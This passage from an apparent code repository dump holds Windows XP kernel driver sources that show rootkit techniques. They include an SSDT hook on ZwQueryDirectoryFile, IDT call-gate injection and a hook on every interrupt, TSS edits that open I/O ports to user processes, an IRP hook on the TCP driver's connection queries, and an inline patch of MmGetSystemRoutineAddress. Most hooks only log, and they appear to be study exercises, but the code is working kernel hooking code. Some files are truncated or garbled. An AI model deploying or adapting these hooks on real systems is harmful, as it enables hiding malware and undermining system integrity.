OPTIONAL, 59 | IN BOOLEAN RestartScan 60 | ); 61 | 62 | typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)( 63 | IN HANDLE FileHandle, 64 | IN HANDLE Event OPTIONAL, 65 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 66 | IN PVOID ApcContext OPTIONAL, 67 | OUT PIO_STATUS_BLOCK IoStatusBlock, 68 | OUT PVOID FileInformation, 69 | IN ULONG Length, 70 | IN FILE_INFORMATION_CLASS FileInformationClass, 71 | IN BOOLEAN ReturnSingleEntry, 72 | IN PUNICODE_STRING FileName OPTIONAL, 73 | IN BOOLEAN RestartScan 74 | ); 75 | 76 | ZWQUERYDIRECTORYFILE OldZwQueryFileDirectoryFile; 77 | 78 | NTSTATUS NewZwQueryDirectoryFile( 79 | IN HANDLE FileHandle, 80 | IN HANDLE Event OPTIONAL, 81 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 82 | IN PVOID ApcContext OPTIONAL, 83 | OUT PIO_STATUS_BLOCK IoStatusBlock, 84 | OUT PVOID FileInformation, 85 | IN ULONG Length, 86 | IN FILE_INFORMATION_CLASS FileInformationClass, 87 | IN BOOLEAN ReturnSingleEntry, 88 | IN PUNICODE_STRING FileName OPTIONAL, 89 | IN BOOLEAN RestartScan 90 | ) 91 | { 92 | DbgPrint("New called %wZ!\n", FileName); 93 | return OldZwQueryFileDirectoryFile( 94 | FileHandle, 95 | Event, 96 | ApcRoutine, 97 | ApcContext, 98 | IoStatusBlock, 99 | FileInformation, 100 | Length, 101 | FileInformationClass, 102 | ReturnSingleEntry, 103 | FileName, 104 | RestartScan); 105 | } 106 | 107 | NTSTATUS Hook() 108 | { 109 | MyMDL = MmCreateMdl( 110 | NULL, 111 | KeServiceDescriptorTable.ServiceTableEntry, 112 | KeServiceDescriptorTable.NumberOfServices * 4); 113 | if (MyMDL == NULL) 114 | return STATUS_UNSUCCESSFUL; 115 | 116 | MmBuildMdlForNonPagedPool(MyMDL); 117 | MyMDL->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA; 118 | NewSystemCallTable = MmMapLockedPages(MyMDL, KernelMode); 119 | if (!NewSystemCallTable) 120 | return STATUS_UNSUCCESSFUL; 121 | 122 | HOOK(ZwQueryDirectoryFile, NewZwQueryDirectoryFile, OldZwQueryFileDirectoryFile); 123 | return STATUS_SUCCESS; 124 | } 125 | 126 | NTSTATUS Unhook() 127 | { 128 | if (NewSystemCallTable) 129 | { 130 | UNHOOK(ZwQueryDirectoryFile, OldZwQueryFileDirectoryFile); 131 | MmUnmapLockedPages(NewSystemCallTable, MyMDL); 132 | IoFreeMdl(MyMDL); 133 | } 134 | return STATUS_SUCCESS; 135 | } 136 | 137 | NTSTATUS Unload(PDRIVER_OBJECT driver) 138 | { 139 | NTSTATUS status; 140 | DbgPrint("Unload!\n"); 141 | return Unhook(); 142 | } 143 | 144 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 145 | { 146 | DbgPrint("DriverEntry!\n"); 147 | driver->DriverUnload = Unload; 148 | Hook(); 149 | return STATUS_SUCCESS; 150 | } -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/objfre_wxp_x86/i386/main.obj.oacr.root.x86fre.pft.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 4 | 0 5 | 10920main.cc:\project\drivers\hookzwquerydirectoryfile\28159Consider using 'IoAllocateMdl' instead of 'MmCreateMdl'. Reason: Obsolete.Hook107 6 | 11838main.cc:\project\drivers\hookzwquerydirectoryfile\28159Consider using 'MmMapLockedPagesSpecifyCache' instead of 'MmMapLockedPages'. Reason: Obsolete except on Windows 98. Use MmGetSystemAddressForMdlSafe if this is a call to MmGetSystemAddressForMdl..Hook107 7 | 1178main.cc:\project\drivers\hookzwquerydirectoryfile\28145The opaque MDL structure should not be modified by a driver.Hook107 8 | 1449main.cc:\project\drivers\hookzwquerydirectoryfile\28101The Drivers module has inferred that the current function is a DRIVER_INITIALIZE function: This is informational only. No problem has been detected.DriverEntry144 9 | 14722main.cc:\project\drivers\hookzwquerydirectoryfile\28155The function being assigned or passed should be a DRIVER_UNLOAD function: Add the declaration 'DRIVER_UNLOAD Unload;' before the current first declaration of Unload.DriverEntry144 10 | 11 | -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=HookZwQueryDirectoryFile 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /IDTCALL/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "stdio.h" 3 | 4 | 5 | #define IDT_LIMIT (0xff * 8) 6 | #define GATE_TYPE 0xEE 7 | 8 | typedef unsigned int DWORD; 9 | typedef unsigned char BYTE; 10 | typedef unsigned short WORD; 11 | 12 | char outString[] = "abcdefg"; 13 | 14 | int now; 15 | typedef struct _IDTGATE { 16 | WORD offsetl; 17 | WORD selector; 18 | BYTE count; 19 | BYTE type; 20 | WORD offseth; 21 | } IDTGATE, *PIDTGATE; 22 | 23 | 24 | __declspec(naked) void MyCALLGATE() 25 | { 26 | __asm { 27 | cli; 28 | pushad; 29 | pushfd; 30 | mov eax, offset outString; 31 | push eax; 32 | mov eax, 80528e92h; 33 | call eax; 34 | pop eax; 35 | popfd; 36 | popad; 37 | sti; 38 | iretd; 39 | } 40 | } 41 | 42 | NTSTATUS AddCallGate(DWORD MyCALLGATE) 43 | { 44 | char s[256]; 45 | char idt[6]; 46 | DWORD base; 47 | PIDTGATE pCallGate = NULL; 48 | 49 | now = 0; 50 | 51 | _asm sidt idt; 52 | base = *(DWORD*)(idt + 2); 53 | 54 | while (now < IDT_LIMIT) 55 | { 56 | pCallGate = (PIDTGATE)(base + now); 57 | if ((pCallGate->type & 0x80) == 0) 58 | { 59 | _snprintf(s, 256, "%08x\n", now/8); 60 | DbgPrint(s); 61 | pCallGate->type = GATE_TYPE; 62 | pCallGate->offsetl = (WORD)((DWORD)MyCALLGATE & 0xFFFF); 63 | pCallGate->selector = 0x08; 64 | pCallGate->offseth = (WORD)((DWORD)MyCALLGATE >> 16); 65 | pCallGate->count = 0; 66 | DbgPrint("Add IDT gate!\n"); 67 | break; 68 | } 69 | now += 8; 70 | } 71 | 72 | return STATUS_SUCCESS; 73 | } 74 | 75 | void Unload(PDRIVER_OBJECT driver) 76 | { 77 | char idt[6]; 78 | DWORD base; 79 | PIDTGATE pCallGate = NULL; 80 | 81 | _asm sidt idt; 82 | 83 | base = *(DWORD*)(idt + 2); 84 | pCallGate = (PIDTGATE)(base + now); 85 | pCallGate->type = 0; 86 | DbgPrint("Unload!\n"); 87 | } 88 | 89 | NTSTATUS DriverEntry(IN PDRIVER_OBJECT driver, IN PUNICODE_STRING szReg) 90 | { 91 | AddCallGate((DWORD)MyCALLGATE); 92 | driver->DriverUnload = Unload; 93 | return STATUS_SUCCESS; 94 | } -------------------------------------------------------------------------------- /IDTCALL/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IDTCALL/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IDTCALL 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /IDTHook/IDTHook.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "stdio.h" 3 | 4 | typedef unsigned short WORD; 5 | typedef unsigned long ULONG, DWORD; 6 | typedef unsigned char BYTE; 7 | 8 | typedef struct _IDTINFO 9 | { 10 | WORD IDTLimit; 11 | WORD LowIDTBase; 12 | WORD HiIDTBase; 13 | } IDTINFO; 14 | 15 | #define MAKELONG(a,b) ((DWORD) (((WORD) (a)) | (((DWORD) ((WORD) (b))) << 16))) 16 | 17 | #pragma pack(1) 18 | typedef struct _IDTENTRY 19 | { 20 | WORD LowOffset; 21 | WORD selector; 22 | BYTE unused_lo; 23 | unsigned char unused_hi:5; 24 | unsigned char DPL:2; 25 | unsigned char P:1; 26 | WORD HiOffset; 27 | } IDTENTRY; 28 | #pragma pack() 29 | 30 | IDTINFO IdtInfo; 31 | IDTENTRY *IdtEntries; 32 | DWORD old[256]; 33 | DWORD count[256]; 34 | BYTE* tables; 35 | 36 | #define MIN_IDT 0 37 | #define MAX_IDT 0xFF 38 | 39 | char template[] = { 40 | 0x90, //nop, debug 41 | 0x60, //pushad 42 | 0x9C, //pushfd 43 | 0xB8, 0xAA, 0x00, 0x00, 0x00, //mov eax, AAh 44 | 0x50, //push eax 45 | 0x9A, 0x11, 0x22, 0x33, 0x44, 0x08, 0x00, //call 08:44332211h 46 | 0x58, //pop eax 47 | 0x9D, //popfd 48 | 0x61, //popad 49 | 0xEA, 0x11, 0x22, 0x33, 0x44, 0x08, 0x00 //jmp 08:44332211h 50 | }; 51 | 52 | void __stdcall NewISR(DWORD nouse) 53 | { 54 | unsigned long *index; 55 | unsigned long i; 56 | 57 | __asm mov eax,[ebp+0Ch] 58 | __asm mov i, eax 59 | 60 | i = i & 0xFF; 61 | index = &count[i]; 62 | InterlockedIncrement(index); 63 | } 64 | 65 | void HookIDT() 66 | { 67 | int i, offset = 0; 68 | char* entry; 69 | for (i = MIN_IDT; i < MAX_IDT; i++) 70 | { 71 | old[i] = MAKELONG(IdtEntries[i].LowOffset, IdtEntries[i].HiOffset); 72 | entry = tables + offset; 73 | memcpy(entry, template, sizeof(template)); 74 | entry[4] = (BYTE)i; 75 | *((DWORD*)(&entry[10])) = (DWORD)NewISR; 76 | *((DWORD*)(&entry[20])) = (DWORD)old[i]; 77 | __asm cli 78 | IdtEntries[i].LowOffset = (WORD)entry; 79 | IdtEntries[i].HiOffset = (WORD)((DWORD)entry >> 16); 80 | __asm sti 81 | offset += sizeof(template); 82 | } 83 | } 84 | 85 | void UnHookIDT() 86 | { 87 | int i; 88 | char s[256]; 89 | for (i = MIN_IDT; i < MAX_IDT; i++) 90 | { 91 | __asm cli 92 | IdtEntries[i].LowOffset = (WORD)old[i]; 93 | IdtEntries[i].HiOffset = (WORD)(old[i]>> 16); 94 | __asm sti 95 | _snprintf(s, 256, "%d: %08x count: %d\n", i, old[i], count[i]); 96 | DbgPrint(s); 97 | } 98 | } 99 | 100 | VOID Unload(PDRIVER_OBJECT driver) 101 | { 102 | UnHookIDT(); 103 | ExFreePool(tables); 104 | } 105 | 106 | NTSTATUS DriverEntry( PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 107 | { 108 | _asm sidt IdtInfo 109 | IdtEntries = (IDTENTRY *)MAKELONG(IdtInfo.LowIDTBase, IdtInfo.HiIDTBase); 110 | tables = ExAllocatePool(NonPagedPool, sizeof(template)*256); 111 | HookIDT(); 112 | DbgPrint("DriverEntry success!\n"); 113 | driver->DriverUnload = Unload; 114 | return STATUS_SUCCESS; 115 | } 116 | -------------------------------------------------------------------------------- /IDTHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IDTHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IDTHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=IDTHook.c 14 | -------------------------------------------------------------------------------- /IOMAP/IOMAP.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/IOMAP/IOMAP.suo -------------------------------------------------------------------------------- /IOMAP/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IOMAP/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=IOMAP 2 | TARGETPATH=OBJ 3 | TARGETTYPE=DRIVER 4 | SOURCES=main.c -------------------------------------------------------------------------------- /IOMAP/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "string.h" 3 | 4 | #ifndef DWORD 5 | #define DWORD unsigned int 6 | #endif 7 | 8 | #ifndef WORD 9 | #define WORD unsigned short 10 | #endif 11 | 12 | #define IBUSY 9 13 | #define LIMIT 0x20AB 14 | #define EXPAN 0x2FFF 15 | 16 | #pragma pack(1) 17 | typedef struct _GDTR { 18 | WORD Limit; 19 | DWORD *dwBase; 20 | } GDTR, *PGDTR; 21 | typedef struct _GDTENTRY{ 22 | DWORD dwLimit : 16; 23 | DWORD dwBaselo : 16; 24 | DWORD dwBasemid : 8; 25 | DWORD dwType : 4; 26 | DWORD dwSystem : 1; 27 | DWORD dwDpl : 2; 28 | DWORD dwPresent : 1; 29 | DWORD dwLimithi : 4; 30 | DWORD dwAvailable : 1; 31 | DWORD dwZero : 1; 32 | DWORD dwSize : 1; 33 | DWORD dwGranularity : 1; 34 | DWORD dwBasehi : 8; 35 | } GDTENTRY, *PGDTENTRY; 36 | #pragma pack() 37 | 38 | 39 | void SetIO(int vv) 40 | { 41 | GDTR gdtr; 42 | PGDTENTRY entry; 43 | WORD TSSSeg; 44 | 45 | __asm 46 | { 47 | cli; 48 | sgdt gdtr; 49 | str TSSSeg; 50 | movzx esi, TSSSeg; 51 | add esi, gdtr.dwBase; 52 | mov entry, esi 53 | } 54 | 55 | if (vv) 56 | { 57 | entry->dwLimit = EXPAN; 58 | } else 59 | { 60 | entry->dwLimit = LIMIT; 61 | } 62 | 63 | entry->dwType = IBUSY; 64 | __asm 65 | { 66 | ltr TSSSeg; 67 | sti; 68 | } 69 | } 70 | 71 | void Unload(PDRIVER_OBJECT driver) 72 | { 73 | SetIO(0); 74 | DbgPrint("Unload!\n"); 75 | } 76 | 77 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 78 | { 79 | SetIO(1); 80 | driver->DriverUnload = Unload; 81 | DbgPrint("Entry!\n"); 82 | return STATUS_SUCCESS; 83 | } -------------------------------------------------------------------------------- /IOMAP2/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | #define IOPM_SIZE 0x2000 4 | 5 | typedef UCHAR IOPM[IOPM_SIZE]; 6 | IOPM* MyIOPM = NULL; 7 | 8 | void Ke386SetIoAccessMap(int, IOPM *); 9 | void Ke386QueryIoAccessMap(int, IOPM *); 10 | void Ke386IoSetAccessProcess(PEPROCESS, int); 11 | NTSTATUS PsLookupProcessByProcessId( 12 | IN ULONG ulProcId, 13 | OUT PEPROCESS* pEProcess 14 | ); 15 | 16 | NTSTATUS Create(PDEVICE_OBJECT device, PIRP pIrp) 17 | { 18 | pIrp->IoStatus.Status = STATUS_SUCCESS; 19 | pIrp->IoStatus.Information = 0; 20 | IoCompleteRequest(pIrp, IO_NO_INCREMENT); 21 | return STATUS_SUCCESS; 22 | } 23 | 24 | NTSTATUS Dispatch(PDEVICE_OBJECT device, PIRP pIrp) 25 | { 26 | PIO_STACK_LOCATION irpsp; 27 | NTSTATUS status = STATUS_SUCCESS; 28 | PUCHAR charBuffer; 29 | PUSHORT shortBuffer; 30 | PULONG longBuffer; 31 | PVOID ioBuffer; 32 | 33 | USHORT offset; 34 | UCHAR value; 35 | 36 | int a, b; 37 | ULONG processID; 38 | PEPROCESS process; 39 | 40 | irpsp = IoGetCurrentIrpStackLocation(pIrp); 41 | ioBuffer = pIrp->AssociatedIrp.SystemBuffer; 42 | charBuffer = (PUCHAR)ioBuffer; 43 | shortBuffer = (PUSHORT)ioBuffer; 44 | longBuffer = (PULONG)ioBuffer; 45 | 46 | switch (irpsp->Parameters.DeviceIoControl.IoControlCode) 47 | { 48 | case 0x04: 49 | DbgPrint("IOCTL: 0x04 - Set IOPM of ProcessID"); 50 | processID = longBuffer[0]; 51 | PsLookupProcessByProcessId(processID, &process); 52 | DbgPrint("Pointer to process is %08x\n", process); 53 | DbgPrint("Address = %08x\n", *(*MyIOPM + 0x6F)); 54 | Ke386SetIoAccessMap(1, MyIOPM); 55 | Ke386IoSetAccessProcess(process, 1); 56 | break; 57 | case 0x08: 58 | DbgPrint("IOCTL 0x08 - READ_PORT_UCHAR 0x%X", shortBuffer[0]); 59 | (UCHAR)value = READ_PORT_UCHAR((PUCHAR)shortBuffer[0]); 60 | DbgPrint("Value read : %X", value); 61 | charBuffer[0] = value; 62 | break; 63 | case 0x0C: 64 | DbgPrint("IOCTL 0x0C - WRITE_PORT_UCHAR(0x%X <- 0x%X)", shortBuffer[0]); 65 | WRITE_PORT_UCHAR((PUCHAR)shortBuffer[0], charBuffer[2]); 66 | break; 67 | case 0x10: 68 | DbgPrint("IOCTL 0x10 - RTLFillMemory (Turn off all access)"); 69 | RtlFillMemory(MyIOPM, sizeof(IOPM), 0xFF); 70 | break; 71 | case 0x14: 72 | DbgPrint("IOCTL 0x10 - Set IO Permission Bitmap"); 73 | offset = shortBuffer[0]; 74 | value = charBuffer[2]; 75 | DbgPrint("Offset = %x, value = %x\n", offset, value); 76 | *(*MyIOPM + offset) = value; 77 | break; 78 | default: 79 | status = STATUS_UNSUCCESSFUL; 80 | } 81 | pIrp->IoStatus.Status = status; 82 | pIrp->IoStatus.Information = 0; 83 | return status; 84 | } 85 | 86 | void Unload(PDRIVER_OBJECT driver) 87 | { 88 | WCHAR DOSNameBuffer[] = L"\\DosDevices\\PortTalk"; 89 | UNICODE_STRING uniDosString; 90 | 91 | DbgPrint("Unload!\n"); 92 | if (MyIOPM) 93 | MmFreeNonCachedMemory(MyIOPM, sizeof(IOPM)); 94 | RtlInitUnicodeString(&uniDosString, DOSNameBuffer); 95 | IoDeleteSymbolicLink(&uniDosString); 96 | IoDeleteDevice(driver->DeviceObject); 97 | } 98 | 99 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 100 | { 101 | PDEVICE_OBJECT device; 102 | int a, b; 103 | NTSTATUS status; 104 | WCHAR NameBuffer[] = L"\\Device\\PortTalk"; 105 | WCHAR DosNameBuffer[] = L"\\DosDevices\\PortTalk"; 106 | UNICODE_STRING uniNameString, uniDosString; 107 | 108 | DbgPrint("PortTalk has loaded!\n"); 109 | 110 | MyIOPM = MmAllocateNonCachedMemory(sizeof(IOPM)); 111 | if (MyIOPM == NULL) 112 | { 113 | DbgPrint("MmAllocateNonCachedMemory error!\n"); 114 | return STATUS_INSUFFICIENT_RESOURCES; 115 | } 116 | 117 | RtlFillMemory(MyIOPM, sizeof(IOPM), 0xFF); 118 | DbgPrint("Memory Allocated at %x\n", MyIOPM); 119 | 120 | RtlInitUnicodeString(&uniNameString, NameBuffer); 121 | RtlInitUnicodeString(&uniDosString, DosNameBuffer); 122 | 123 | status = IoCreateDevice( 124 | driver, 125 | 0, 126 | &uniNameString, 127 | FILE_DEVICE_UNKNOWN, 128 | 0, 129 | FALSE, 130 | &device ); 131 | if (status != STATUS_SUCCESS) 132 | return status; 133 | 134 | status = IoCreateSymbolicLink(&uniDosString, &uniNameString); 135 | if (status != STATUS_SUCCESS) 136 | return status; 137 | 138 | driver->MajorFunction[IRP_MJ_CREATE] = Create; 139 | driver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = Dispatch; 140 | driver->DriverUnload = Unload; 141 | 142 | return STATUS_SUCCESS; 143 | } 144 | -------------------------------------------------------------------------------- /IOMAP2/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IOMAP2/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IOMAP2 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /IRPHook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | typedef unsigned short WCHAR, WORD; 4 | typedef unsigned long ULONG, DWORD; 5 | typedef unsigned char CHAR, BYTE; 6 | typedef unsigned long* PULONG; 7 | 8 | PFILE_OBJECT pFile = NULL; 9 | PDEVICE_OBJECT pDevTcp= NULL; 10 | PDRIVER_OBJECT pDrvTcp = NULL; 11 | 12 | typedef NTSTATUS (*FUNCTION)(IN PDEVICE_OBJECT, IN PIRP); 13 | FUNCTION old; 14 | 15 | #define CO_TL_ENTITY 0x400 16 | #define CL_TL_ENTITY 0x401 17 | #define IOCTL_TCP_QUERY 0x00120003 18 | 19 | typedef struct _TDIEntityID { 20 | ULONG tei_entity; 21 | ULONG tei_instance; 22 | } TDIEntityID; 23 | typedef struct _TDIObjectID { 24 | TDIEntityID toi_entity; 25 | ULONG toi_class; 26 | ULONG toi_type; 27 | ULONG toi_id; 28 | } TDIObjectID; 29 | 30 | typedef struct _REQINFO { 31 | PIO_COMPLETION_ROUTINE old; 32 | ULONG ReqType; 33 | } REQINFO, *PRQINFO; 34 | 35 | 36 | #define HTONS(a) ((((a) & 0xFF)<<8) + (((a) & 0xFF00)>>8)) 37 | typedef struct _CONNINFO101 { 38 | ULONG status; 39 | ULONG src_addr; 40 | WORD src_port; 41 | WORD u1; 42 | ULONG dst_addr; 43 | WORD dst_port; 44 | WORD u2; 45 | } CONNINFO101, *PCONNINFO101; 46 | typedef struct _CONNINFO102 { 47 | ULONG status; 48 | ULONG src_addr; 49 | WORD src_port; 50 | WORD u1; 51 | ULONG dst_addr; 52 | WORD dst_port; 53 | WORD u2; 54 | ULONG pid; 55 | } CONNINFO102, *PCONNINFO102; 56 | typedef struct _CONNINFO110 { 57 | ULONG status; 58 | ULONG src_addr; 59 | WORD src_port; 60 | WORD u1; 61 | ULONG dst_addr; 62 | WORD dst_port; 63 | WORD u2; 64 | ULONG pid; 65 | PVOID u3[35]; 66 | } CONNINFO110, *PCONNINFO110; 67 | 68 | 69 | NTSTATUS IoCompleteRoutine(IN PDEVICE_OBJECT device, 70 | IN PIRP pIrp, 71 | IN PVOID context) 72 | { 73 | PVOID outputBuffer; 74 | DWORD NumberOfOutput; 75 | PIO_COMPLETION_ROUTINE pCompRoutine; 76 | DWORD i; 77 | 78 | outputBuffer = pIrp->UserBuffer; 79 | pCompRoutine = ((REQINFO)context)->old; 80 | if (((REQINFO)context)->ReqType == 0x101) 81 | { 82 | NumberOfOutput = pIrp->IoStatus.Information / 83 | sizeof(CONNINFO101); 84 | for (i=0; iReqType == 0x102) 91 | { 92 | NumberOfOutput = pIrp->IoStatus.Information / 93 | sizeof(CONNINFO102); 94 | for (i=0; iReqType == 0x110) 101 | { 102 | NumberOfOutput = pIrp->IoStatus.Information / 103 | sizeof(CONNINFO110); 104 | for (i=0; iStackCount > 1) 112 | && (pCompRoutine != NULL)) 113 | { 114 | return pCompRoutine(device, pIrp, NULL); 115 | } 116 | else 117 | { 118 | return pIrp->IoStatus.Status; 119 | } 120 | } 121 | NTSTATUS MyFunc(IN PDEVICE_OBJECT device, IN PIRP pIrp) 122 | { 123 | PIO_STACK_LOCATION irpStack; 124 | TDIObjectID *inputBuffer; 125 | DWORD context; 126 | 127 | irpStack = IoGetCurrentIrpStackLocation(pIrp); 128 | switch (irpStack->MajorFunction) 129 | { 130 | case IRP_MJ_DEVICE_CONTROL: 131 | if ((irpStack->MinorFunction == 0) && 132 | (irpStack->Parameters.DeviceIoControl.IoControlCode == 133 | IOCTL_TCP_QUERY)) 134 | { 135 | inputBuffer = (TDIObjectID*) 136 | irpStack->Parameters.DeviceIoControl.Type3InputBuffer; 137 | if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY) 138 | { 139 | if ((inputBuffer->toi_id == 0x101) || 140 | (inputBuffer->toi_id == 0x102) || 141 | (inputBuffer->toi_id == 0x110)) 142 | { 143 | irpStack->Control = SL_INVOKE_ON_SUCCESS; 144 | irpStack->Context = (PIO_COMPLETION_ROUTINE) 145 | ExAllocatePool(NonPagedPool, sizeof(REQINFO)); 146 | ((REQINFO)irpStack->Context)->old = 147 | irpStack->CompletionRoutine; 148 | ((REQINFO)irpStack->Context)->ReqType = 149 | inputBuffer->toi_id; 150 | irpStack->CompletionRoutine = 151 | (PIO_COMPLETION_ROUTINE)IoCompleteRoutine; 152 | } 153 | } 154 | } 155 | break; 156 | default: 157 | break; 158 | } 159 | return old(device, pIrp); 160 | } 161 | 162 | 163 | NTSTATUS Hook() 164 | { 165 | NTSTATUS status; 166 | UNICODE_STRING usDevTcp; 167 | WCHAR szDevTcpBuffer[] = L"\\Device\\Tcp"; 168 | RtlInitUnicodeString( 169 | &usDevTcp, 170 | szDevTcpBuffer); 171 | 172 | status = IoGetDeviceObjectPointer( 173 | &usDevTcp, 174 | FILE_READ_DATA, 175 | &pFile, 176 | &pDevTcp); 177 | if (status != STATUS_SUCCESS) 178 | return status; 179 | 180 | pDrvTcp = pDevTcp->DriverObject; 181 | old = (FUNCTION)InterlockedExchange( 182 | (PULONG)&pDrvTcp->MajorFunction[IRP_MJ_DEVICE_CONTROL], 183 | (ULONG)MyFunc); 184 | 185 | return status; 186 | } 187 | -------------------------------------------------------------------------------- /IRPHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IRPHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IRPHook 3 | TARGETPATH=obj 4 | TARGETTYPE= 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES= 14 | -------------------------------------------------------------------------------- /Inline Hook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | #define NEWENTRYOFFSET 8 4 | char old[10]; 5 | char outString[] = "Function: %ws\n"; 6 | 7 | __declspec(naked) MyMmGetSystemRoutineAddress() 8 | { 9 | __asm{ 10 | cli; 11 | push ebp; 12 | mov ebp,esp; 13 | sub esp,20h; 14 | mov eax, [ebp + 8] 15 | push eax 16 | mov eax, offset outString; 17 | push eax; 18 | mov eax, 80528e92h; 19 | call eax; 20 | pop eax; 21 | sti; 22 | _emit 0xEA; 23 | _emit 0xAA; 24 | _emit 0xAA; 25 | _emit 0xAA; 26 | _emit 0xAA; 27 | _emit 0x80; 28 | _emit 0x00; 29 | } 30 | } 31 | 32 | void Hook() 33 | { 34 | int i; 35 | UNICODE_STRING uniName; 36 | ULONG Address = 0, newEntry; 37 | unsigned char * realAddress; 38 | unsigned char * funcAddress; 39 | ULONG tempAddress; 40 | char temp[] = { 41 | 0xEA, 42 | 0xAA, 43 | 0xAA, 44 | 0xAA, 45 | 0xAA, 46 | 0x80, 47 | 0x00, 48 | 0x90 49 | }; 50 | 51 | RtlInitUnicodeString(&uniName, L"MmGetSystemRoutineAddress"); 52 | Address = (ULONG)MmGetSystemRoutineAddress(&uniName); 53 | if (Address == 0) 54 | { 55 | DbgPrint("Cannot find address!\n"); 56 | return; 57 | } 58 | realAddress = (unsigned char*)Address; 59 | newEntry = Address + NEWENTRYOFFSET; 60 | 61 | tempAddress = (ULONG)ExAllocatePool(NonPagedPool, 256); 62 | funcAddress = (unsigned char *)tempAddress; 63 | for (i =0; i<256; i++) 64 | { 65 | funcAddress[i] = 66 | ((unsigned char *)MyMmGetSystemRoutineAddress)[i]; 67 | } 68 | *((unsigned long *)(&temp[1])) = (unsigned long)funcAddress; 69 | for (i=0; i<200; i++) 70 | { 71 | if ( (funcAddress[i] == 0xAA) && 72 | (funcAddress[i+1] == 0xAA) && 73 | (funcAddress[i+2] == 0xAA) && 74 | (funcAddress[i+3] == 0xAA) ) 75 | { 76 | *(ULONG*)(&funcAddress[i]) = newEntry; 